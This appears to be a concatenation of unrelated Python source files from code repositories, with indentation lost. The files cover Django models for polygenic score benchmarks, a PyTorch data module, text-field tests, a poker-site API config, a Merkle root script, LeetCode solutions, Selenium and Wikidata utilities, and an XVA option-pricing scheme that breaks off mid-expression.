('Male', 'Male'),
('Female', 'Female')
]
sample_sex = models.CharField(max_length=6,
choices=SAMPLE_SEX_CHOICES,
default='Both',
verbose_name='Sample Sex'
)
sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True)
## Description
phenotyping_free = models.TextField('Detailed Phenotype Description', null=True)
phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample')
followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True)
## Ancestry
ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100)
ancestry_free = models.TextField('Ancestry (e.g. French, Chinese)', null=True)
ancestry_country = models.TextField('Country of Recruitment', null=True)
ancestry_additional = models.TextField('Additional Ancestry Description', null=True)
## Cohorts/Sources
#source_GWAS_catalog = models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20, null=True)
#source_PMID = models.CharField('Source PubMed ID (PMID) or doi', max_length=100, null=True)
cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample')
#cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True)
def __str__(self):
return 'Sample: {}'.format(str(self.pk))
@property
def sample_cases_percent(self):
if self.sample_cases != None:
percent = (self.sample_cases / self.sample_number) * 100
return round(percent,2)
else:
return None
def display_samples_for_table(self, show_percent_cases=False):
div_id = "sample_"+str(self.pk)
sstring = ''
if self.sample_cases != None:
percent_cases = ''
if show_percent_cases:
percent_cases = f' ({self.sample_cases_percent}%)'
sstring += '<div><a class="toggle_table_btn pgs_helptip" id="'+div_id+'" title="Click to show/hide the details">{:,} individuals <i class="fa fa-plus-circle"></i></a></div>'.format(self.sample_number)
sstring += '<div class="toggle_list" id="list_'+div_id+'">'
sstring += '<span class="only_export">[</span>'
sstring += '<ul>\n<li>{:,} cases{}</li>\n'.format(self.sample_cases, percent_cases)
if self.sample_controls != None:
sstring += '<li><span class="only_export">, </span>'
sstring += '{:,} controls</li>'.format(self.sample_controls)
sstring += '</ul>'
sstring += '<span class="only_export">]</span>'
sstring += '</div>'
else:
sstring += '{:,} individuals'.format(self.sample_number)
return sstring
@property
def display_ancestry(self):
if self.ancestry_free in ['NR', '', None]:
return self.ancestry_broad
else:
return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free)
@property
def display_ancestry_inline(self):
if self.ancestry_free in ['NR', '', None]:
return self.ancestry_broad
else:
return '{} ({})'.format(self.ancestry_broad, self.ancestry_free)
class BM_Performance(models.Model):
"""Class to hold performance/accuracy metrics for a PGS and a set of samples"""
# Links to related objects
score_id = models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True)
sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample',
related_name='sample_performance') # Samples used for evaluation
efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name="efotrait_performance")
cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance')
def __str__(self):
return '%s | %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short)
class Meta:
get_latest_by = 'num'
@property
def effect_sizes_list(self):
return self.get_metric_data('Effect Size')
@property
def class_acc_list(self):
return self.get_metric_data('Classification Metric')
@property
def othermetrics_list(self):
return self.get_metric_data('Other Metric')
@property
def performance_metrics(self):
perf_metrics = {}
effect_sizes_list = self.effect_sizes_list
effect_sizes_data = []
if effect_sizes_list:
for effect_size in self.effect_sizes_list:
effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]})
perf_metrics['effect_sizes'] = effect_sizes_data
class_acc_list = self.class_acc_list
class_acc_data = []
if class_acc_list:
for class_acc in self.class_acc_list:
class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]})
perf_metrics['class_acc'] = class_acc_data
othermetrics_list = self.othermetrics_list
othermetrics_data = []
if othermetrics_list:
for othermetrics in othermetrics_list:
othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]})
perf_metrics['othermetrics'] = othermetrics_data
return perf_metrics
def get_metric_data(self, metric_type):
""" Generic method to extract and format the diverse metric data"""
# Using all and filter afterward uses less SQL queries than filtering directly on the queryset
metrics = self.performance_metric.all()
if metrics:
l = []
for m in metrics:
if (m.type == metric_type):
l.append((m.name_tuple(), m.display_value()))
if len(l) != 0:
return l
return None
class BM_Metric(models.Model):
"""Class to hold metric type, name, value and confidence intervals of a performance metric"""
performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name="performance_metric")
TYPE_CHOICES = [
('ES', 'Effect Size'),
('CM', 'Classification Metric'),
('OM', 'Other Metric')
]
type = models.CharField(max_length=40,
choices=TYPE_CHOICES,
default='Other Metric',
db_index=True
)
name = models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) # ex: "Odds Ratio"
name_short = models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True) # ex: "OR"
estimate = models.FloatField(verbose_name='Estimate', null=False)
unit = models.TextField(verbose_name='Units of the effect size', max_length=100, blank = False)
ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True)
se = models.FloatField(verbose_name='Standard error of the effect', null=True)
def __str__(self):
if self.ci != None:
s = '{} {}'.format(self.estimate, self.ci)
else:
s = '{}'.format(self.estimate)
if (self.name_short):
return '%s (%s): %s'%(self.name, self.name_short, s)
else:
return '%s: %s'%(self.name, s)
def display_value(self):
if self.ci != None:
s = '{} {}'.format(self.estimate, self.ci)
else:
s = '{}'.format(self.estimate)
return s
def name_tuple(self):
if self.name_short is None:
return (self.name, self.name)
else:
return (self.name, self.name_short)
| 2.359375 | 2 |
dataset.py | sehandev/transformer-pytorch | 0 | 12797493 | # Standard
# PIP
from torch.utils.data import DataLoader
from pytorch_lightning import LightningDataModule
from torchtext.datasets import WikiText2
# Custom
class CustomDataModule(LightningDataModule):
def __init__(
self,
batch_size=1,
num_workers=0,
):
super().__init__()
self.batch_size = batch_size
self.num_workers = num_workers
def setup(
self,
stage=None,
):
# Assign train & val datasets
if stage == "fit" or stage is None:
self.train_dataset = WikiText2(split='train')
self.valid_dataset = WikiText2(split='valid')
# Assign test dataset
if stage == "test" or stage is None:
self.test_dataset = WikiText2(split='test')
def train_dataloader(self):
return DataLoader(
dataset=self.train_dataset,
batch_size=self.batch_size,
shuffle=True,
num_workers=self.num_workers,
)
def val_dataloader(self):
return DataLoader(
dataset=self.valid_dataset,
batch_size=self.batch_size,
shuffle=True,
num_workers=self.num_workers,
)
def test_dataloader(self):
return DataLoader(
dataset=self.test_dataset,
batch_size=self.batch_size,
shuffle=False,
num_workers=self.num_workers,
)
| 2.671875 | 3 |
test/test_field.py | aimagelab/speaksee | 29 | 12797494 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
import speaksee.data as data
import numpy as np
import torch
'''class TestImageField(object):
def test_preprocessing(self):
field = data.ImageField()
image = ''
expected_image = ''
assert field.preprocess(image) == expected_image
'''
class TestTextField(object):
def test_pad(self):
# Default case.
field = data.TextField()
minibatch = [["a", "sentence", "of", "data", "."],
["yet", "another"],
["one", "last", "sent"]]
expected_padded_minibatch = [["a", "sentence", "of", "data", "."],
["yet", "another", "<pad>", "<pad>", "<pad>"],
["one", "last", "sent", "<pad>", "<pad>"]]
expected_lengths = [5, 2, 3]
assert field.pad(minibatch) == expected_padded_minibatch
field = data.TextField(include_lengths=True)
assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths)
# Test fix_length properly truncates and pads.
field = data.TextField(fix_length=3)
minibatch = [["a", "sentence", "of", "data", "."],
["yet", "another"],
["one", "last", "sent"]]
expected_padded_minibatch = [["a", "sentence", "of"],
["yet", "another", "<pad>"],
["one", "last", "sent"]]
expected_lengths = [3, 2, 3]
assert field.pad(minibatch) == expected_padded_minibatch
field = data.TextField(fix_length=3, include_lengths=True)
assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths)
field = data.TextField(fix_length=3, truncate_first=True)
expected_padded_minibatch = [["of", "data", "."],
["yet", "another", "<pad>"],
["one", "last", "sent"]]
assert field.pad(minibatch) == expected_padded_minibatch
# Test init_token is properly handled.
field = data.TextField(fix_length=4, init_token="<bos>")
minibatch = [["a", "sentence", "of", "data", "."],
["yet", "another"],
["one", "last", "sent"]]
expected_padded_minibatch = [["<bos>", "a", "sentence", "of"],
["<bos>", "yet", "another", "<pad>"],
["<bos>", "one", "last", "sent"]]
expected_lengths = [4, 3, 4]
assert field.pad(minibatch) == expected_padded_minibatch
field = data.TextField(fix_length=4, init_token="<bos>", include_lengths=True)
assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths)
# Test init_token and eos_token are properly handled.
field = data.TextField(init_token="<bos>", eos_token="<eos>")
minibatch = [["a", "sentence", "of", "data", "."],
["yet", "another"],
["one", "last", "sent"]]
expected_padded_minibatch = [
["<bos>", "a", "sentence", "of", "data", ".", "<eos>"],
["<bos>", "yet", "another", "<eos>", "<pad>", "<pad>", "<pad>"],
["<bos>", "one", "last", "sent", "<eos>", "<pad>", "<pad>"]]
expected_lengths = [7, 4, 5]
assert field.pad(minibatch) == expected_padded_minibatch
field = data.TextField(init_token="<bos>", eos_token="<eos>", include_lengths=True)
assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths)
def test_decode(self):
def test_all_dtypes(word_idxs, expected_output):
assert field.decode(word_idxs) == expected_output
assert field.decode(np.asarray(word_idxs)) == expected_output
assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output
class MyVocab(object):
def __init__(self, eos_token):
self.itos = {0: 'a',
1: 'b',
2: eos_token,
3: 'c'}
field = data.TextField()
field.vocab = MyVocab(field.eos_token)
# Empty captions (not tested for PyTorch tensors)
word_idxs = []
expected_output = ''
assert field.decode(word_idxs) == expected_output
assert field.decode(np.asarray(word_idxs)) == expected_output
word_idxs = [[]]
expected_output = ['', ]
assert field.decode(word_idxs) == expected_output
assert field.decode(np.asarray(word_idxs)) == expected_output
# Single caption
word_idxs = [0, 3, 2, 1]
expected_output = 'a c'
test_all_dtypes(word_idxs, expected_output)
# Batch of captions
word_idxs = [[0, 3, 2, 1],
[3, 3, 2, 1],
[2, 1, 1, 1]]
expected_output = ['a c', 'c c', '']
test_all_dtypes(word_idxs, expected_output)
| 2.8125 | 3 |
swc-api/config.py | aehaynes/btcpokerstats | 0 | 12797495 | <gh_stars>0
SWC_USERNAME = ['Irresonsibl','Irrsponsible', 'Irresponsibl']
SWC_PASSWORD = '<PASSWORD>'
SLEEP_MILLISECONDS = 750
GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18'
USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7'
SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu'
SERVICE_PORT = 8088
MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php'
SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt'
END_STR = '\x00'
UNNAMED_HAND_IDENTIFIER = 'UNDEFINED'
SITTINGOUT_STR = 'Sitting Out'
BASE_DIR = '/home/nonroot/Projects/' #Change this path
HH_PATH = BASE_DIR + 'swc-api/outdir/'
DB_INFO = ['swc','postgres', 'postgres']
CHAT_PATH = BASE_DIR + 'swc-api/Log Archives/'
| 1.632813 | 2 |
merkle.py | makiolo/root_merkle_tree | 2 | 12797496 | <filename>merkle.py<gh_stars>1-10
'''
Generate root merkle tree hash in python.
I use https://github.com/bitcoin/bitcoin as reference:
BlockBuildMerkleTree --> Satoshi implmentation
BlockMerkleRoot ---> new bitcoin core implementation
'''
import pandas as pd
from hashlib import sha256
from io import StringIO
# h( h(1) + h(2) )
# 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8
# h( h(3) + h(4) )
# b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2
# h( h( h(1) + h(2) ) + h( h(3) + h(4) ) )
# 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766
dataset = StringIO("""\
transaction1_serialized_A_B_3
transaction2_serialized_B_C_1
transaction3_serialized_D_E_2
transaction4_serialized_E_B_1
transaction5_serialized_C_B_2
transaction6_serialized_D_A_1
""")
df = pd.read_csv(dataset, encoding='utf-8', header=None)
hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist()
while len(hashes) > 1:
if len(hashes) % 2 != 0:
hashes.append(hashes[-1])
i = 0
j = 0
while i + 1 < len(hashes):
hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest()
i += 2
j += 1
hashes = hashes[:int(len(hashes) / 2)]
# tree condensed in a hash
print(hashes[0])
| 2.640625 | 3 |
astro345_fall2015/astro345_hw12.py | johnnydevriese/wsu_courses | 0 | 12797497 | <filename>astro345_fall2015/astro345_hw12.py
import matplotlib.pyplot as plt
from pylab import *
def moon(x):
P = 3340 * 1.622 * x
return P
def mars(x):
P = 3930 * 3.711 * x
return P
def earth(x):
P = 5510 * 9.807 * x
return P
def jupiter(x):
P = 1330 * 24.79 * x
return P
def f(x):
P = 4e9
return ones(shape(x)) * P
x = arange(0,3e6,100)
y_max = earth(3e6)
plt.xlabel('Depth Inside Planet (meters)')
plt.ylabel('Pressure Inside Planet (Pascals)')
plt.title('Depth vs Pressure for Planets')
plt.plot(x,f(x))
plt.plot(x,moon(x), label='Moon')
plt.plot(x,mars(x), label='Mars')
plt.plot(x,earth(x), label='Earth')
plt.plot(x,jupiter(x), label='Jupiter')
plt.axis([0,3e6,0,y_max])
plt.legend()
#~ plt.plot([1,2,3,4])
#~ plt.ylabel('some numbers')
plt.show()
| 3.25 | 3 |
solutions/0279.Perfect_Squares/python_solution.py | garyzccisme/leetcode | 2 | 12797498 | # DP
class Solution:
def numSquares(self, n: int) -> int:
squares = [x ** 2 for x in range(1, int(n ** 0.5) + 1)]
dp = [0] + [float('inf')] * n
for i in range(1, n + 1):
for square in squares:
if i < square:
break
dp[i] = min(dp[i], dp[i - square] + 1)
return dp[-1]
# Greedy DFS 1
class Solution:
def numSquares(self, n: int) -> int:
squares = [x ** 2 for x in range(int(n ** 0.5), 0, -1)]
self.ans = float('inf')
self.dfs(n, 0, squares)
return self.ans
def dfs(self, n, count, squares):
if n == 0:
self.ans = count
else:
for i, square in enumerate(squares):
# Find the biggest square that is no larger than n
# If current count is reaching second best answer, prune it
if square <= n and count + 1 < self.ans:
self.dfs(n - square, count + 1, squares[i:])
# Greedy DFS 2
class Solution:
def numSquares(self, n):
def is_divided_by(n, count):
"""
return: true if "n" can be decomposed into "count" number of perfect square numbers.
e.g. n=12, count=3: true.
n=12, count=2: false
"""
if count == 1:
return n in square_nums
for k in square_nums:
if is_divided_by(n - k, count - 1):
return True
return False
square_nums = set([i * i for i in range(1, int(n ** 0.5) + 1)])
for count in range(1, n + 1):
if is_divided_by(n, count):
return count
| 3.09375 | 3 |
codigo_das_aulas/aula_10/aula_10_08.py | VeirichR/curso-python-selenium | 234 | 12797499 | <reponame>VeirichR/curso-python-selenium<filename>codigo_das_aulas/aula_10/aula_10_08.py
from selenium.webdriver import Firefox
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.expected_conditions import (
url_contains,
url_matches
)
url = 'https://selenium.dunossauro.live/aula_10_c.html'
browser = Firefox()
browser.get(url)
wdw = WebDriverWait(browser, 10)
links = browser.find_elements_by_css_selector('.body_b a')
links[1].click()
wdw.until(
url_contains('selenium'),
)
wdw.until(
url_matches('http.*live'),
)
| 2.703125 | 3 |
LexData/utils.py | CedricTarbouriech/LexData | 16 | 12797500 | import functools
import json
from datetime import datetime
from typing import Any, Dict
from .wikidatasession import WikidataSession
@functools.lru_cache()
def getPropertyType(propertyId: str):
repo = WikidataSession()
query = {
"action": "query",
"format": "json",
"prop": "revisions",
"titles": "Property:" + propertyId,
"rvprop": "content",
}
DATA = repo.get(query)
jsonstr = list(DATA["query"]["pages"].values())[0]["revisions"][0]["*"]
content = json.loads(jsonstr)
return content["datatype"]
def buildDataValue(datatype: str, value):
if datatype in [
"wikibase-lexeme",
"wikibase-form",
"wikibase-sense",
"wikibase-item",
"wikibase-property",
]:
if type(value) == dict:
return {"value": value, "type": "wikibase-entity"}
elif type(value) == str:
value = {"entity-type": datatype[9:], "id": value}
return {"value": value, "type": "wikibase-entity"}
else:
raise TypeError(
f"Can not convert type {type(value)} to datatype {datatype}"
)
elif datatype in [
"string",
"tabular-data",
"geo-shape",
"url",
"musical-notation",
"math",
"commonsMedia",
]:
if type(value) == dict:
return {"value": value, "type": "string"}
elif type(value) == str:
return {"value": {"value": value}, "type": "string"}
else:
raise TypeError(
f"Can not convert type {type(value)} to datatype {datatype}"
)
elif datatype == "monolingualtext":
if type(value) == dict:
return {"value": value, "type": "monolingualtext"}
else:
raise TypeError(
f"Can not convert type {type(value)} to datatype {datatype}"
)
elif datatype == "globe-coordinate":
if type(value) == dict:
return {"value": value, "type": "globecoordinate"}
else:
raise TypeError(
f"Can not convert type {type(value)} to datatype {datatype}"
)
elif datatype == "quantity":
if type(value) == dict:
return {"value": value, "type": "quantity"}
if type(value) in [int, float]:
valueObj = {
"amount": "%+f" % value,
"unit": "1",
}
return {"value": valueObj, "type": "time"}
else:
raise TypeError(
f"Can not convert type {type(value)} to datatype {datatype}"
)
elif datatype == "time":
if type(value) == dict:
return {"value": value, "type": "time"}
if type(value) == datetime:
cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0)
valueObj: Dict[str, Any] = {
"time": "+" + cleanedDateTime.isoformat() + "Z",
"timezone": 0,
"before": 0,
"after": 0,
"precision": 11,
"calendarmodel": "http://www.wikidata.org/entity/Q1985727",
}
return {"value": valueObj, "type": "time"}
else:
raise TypeError(
f"Can not convert type {type(value)} to datatype {datatype}"
)
else:
raise NotImplementedError(f"Datatype {datatype} not implemented")
def buildSnak(propertyId: str, value):
datatype = getPropertyType(propertyId)
datavalue = buildDataValue(datatype, value)
return {
"snaktype": "value",
"property": propertyId,
"datavalue": datavalue,
"datatype": datatype,
}
| 2.484375 | 2 |
example_xva_v2.py | kwchau/sgbm_xva | 6 | 12797501 | <gh_stars>1-10
"""
Created on Mon May 14 17:21:26 2018
@author: <NAME>
This file holds the parameters for all specific example and the numerical scheme
for the BSDE.
.. todo:: Moving the numerical scheme to the function file
"""
import numpy as np
class GermenIndexPut():
# Example Information
name = "Put option for a 5 stocks German index model"
dimension = 5
# Stock parameters
stock_model = "BS"
initial_value = np.array([0.01, 0.01, 0.01, 0.01, 0.01])
num_of_assets = 5
num_of_brownian_motion = 5
mu_bar = 0.05 * np.ones(num_of_assets, dtype=float)
sigma_bar = np.array([0.518, 0.648, 0.623, 0.570, 0.530])
cholesky_decomposition = np.array([[1., 0., 0., 0., 0.],\
[0.79, 0.613107, 0., 0., 0.],\
[0.82, 0.134071, 0.556439, 0., 0.],\
[0.91, 0.132277, 0.0109005, 0.39279, 0.],\
[0.84, 0.157232, 0.0181865, 0.291768, 0.429207]])
cholesky_inverse = np.linalg.inv(cholesky_decomposition)
# Market parameters and functions
riskless_rate = 0.05
divident_yield = np.zeros(num_of_assets, dtype=float)
bank_bond_yield = 0
counterparty_bond_yield = 0
counterparty_bond_repo_rate = 0
variation_margin_interest_rate = 0.1
stock_repo_rate = 0.07 * np.ones(num_of_assets, dtype=float)
def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process):
temp = \
(1 - (1-theta[0]) * rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\
- delta_t * theta[0] * np.einsum('i, ji, kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\
- delta_t * (1 - theta[0]) * np.einsum('i, ji, jk, lk -> l',
(self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis)
return temp / (1 + rate * delta_t * theta[0])
def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient):
riskfree_delta = \
- (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\
+ (1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\
- delta_t * (1-theta[1]) * (1/theta[1]) * np.einsum('i, ji, jk, lkm -> lm', \
(self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis)
return riskfree_delta
def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis):
riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :])
riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta)
adjusted_delta = \
self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\
+ (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis)
adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\
+ delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\
riskfree_price/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])\
+ delta_t * (1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\
np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])
return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1))
# Product parameters
weight = np.array([38.1, 6.5, 5.7, 27.0, 22.7], dtype=np.double)
strike = 1.
terminal_time = 1.
buy_sell = -1.
put_call = "Put"
# Regression functions and parameters
sorting_method = "Intrinsic Value"
basis = "Intrinsic Value"
basis_order = 3
no_of_regression = 1 + 5 + 1 + 5
def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta):
rec = np.empty((no_of_samples, self.no_of_regression))
rec[:,0] = derivative.reshape(-1)
for i in range(1,6):
rec[:, i] = delta[:, i-1]
rec[:, 6] = adjusted_derivative.reshape(-1)
for i in range(7,12):
rec[:, i] = adjusted_delta[:, i-7]
return rec
# Reference Solution
reference_riskfree = False
reference_riskfree_price = -0.175866
refererce_adjust = False
class ArithmeticBasketPut():
def __init__(self, dimension):
# Example Information
self.name = "Arithmetic basket put option for BS model"
self.dimension = dimension
# Market parameters and functions
self.riskless_rate = 0.06
self.bank_bond_yield = 0.
self.counterparty_bond_yield = 0.
self.counterparty_bond_repo_rate = 0.
self.variation_margin_interest_rate = 0.1
self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float)
# Stock parameters
self.stock_model = "BS"
self.initial_value = 40. * np.ones(dimension)
self.num_of_assets = dimension
self.num_of_brownian_motion = dimension
self.divident_yield = np.zeros(dimension, dtype=float)
self.mu_bar = self.riskless_rate - self.divident_yield
self.sigma_bar = 0.2 * np.ones(dimension)
self.correlation_matrix = 0.75 * np.identity(dimension) + 0.25 * np.ones((dimension, dimension))
self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix)
self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition)
# Product parameters
self.weight = 1/dimension * np.ones(dimension, dtype=np.single)
self.strike = 40.
self.terminal_time = 1.
self.buy_sell = 1.
self.put_call = "Put"
# Regression functions and parameters
self.sorting_method = "Intrinsic Value"
self.basis = "Intrinsic Value"
self.basis_order = 3
self.no_of_regression = 1 + self.num_of_brownian_motion + 1 + self.num_of_brownian_motion
def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process):
temp = \
(1 - (1-theta[0]) * rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\
- delta_t * theta[0] * np.einsum('i, ji, kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\
- delta_t * (1 - theta[0]) * np.einsum('i, ji, jk, lk -> l',
(self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis)
return temp / (1 + rate * delta_t * theta[0])
def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient):
riskfree_delta = \
- (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\
+ (1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\
- delta_t * (1-theta[1]) * (1/theta[1]) * np.einsum('i, ji, jk, lkm -> lm', \
(self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis)
return riskfree_delta
def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis):
riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :])
riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta)
adjusted_delta = \
self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:],
regression_coeff[2 + self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\
+ (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis)
adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :],
regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\
+ delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\
riskfree_price/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])\
+ delta_t * (1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\
np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])
return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1))
def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta):
rec = np.empty((no_of_samples, self.no_of_regression))
rec[:,0] = derivative.reshape(-1)
for i in range(self.num_of_brownian_motion):
rec[:, i+1] = delta[:, i]
rec[:, 1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1)
for i in range(self.num_of_brownian_motion):
rec[:, i + 2 +self.num_of_brownian_motion] = adjusted_delta[:, i]
return rec
# Reference Solution
reference_riskfree = False
refererce_adjust = False
# Under development
class GeometicBasketPut():
def __init__(self, dimension):
# Market parameters and functions
self.riskless_rate = 0.06
self.bank_bond_yield = 0.
self.counterparty_bond_yield = 0.
self.counterparty_bond_repo_rate = 0.
self.variation_margin_interest_rate = 0.1
self.stock_repo_rate = 0.07 * np.ones(dimension, dtype=float)
# Stock parameters
self.stock_model = "BS"
self.initial_value = 40. * np.ones(dimension)
self.num_of_assets = dimension
self.num_of_brownian_motion = dimension
self.divident_yield = np.zeros(dimension, dtype=float)
self.mu_bar = self.riskless_rate - self.divident_yield
self.sigma_bar = 0.2 * np.ones(dimension)
self.correlation_matrix = 0.75 * np.identity(dimension) + 0.25 * np.ones((dimension, dimension))
self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix)
self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition)
# Product parameters
self.weight = 1/dimension * np.ones(dimension, dtype=np.single)
self.strike = 40.
self.terminal_time = 1.
self.buy_sell = 1.
self.put_call = "Put"
def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process):
temp = \
(1 - (1-theta[0]) * rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\
- delta_t * theta[0] * np.einsum('i, ji, kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\
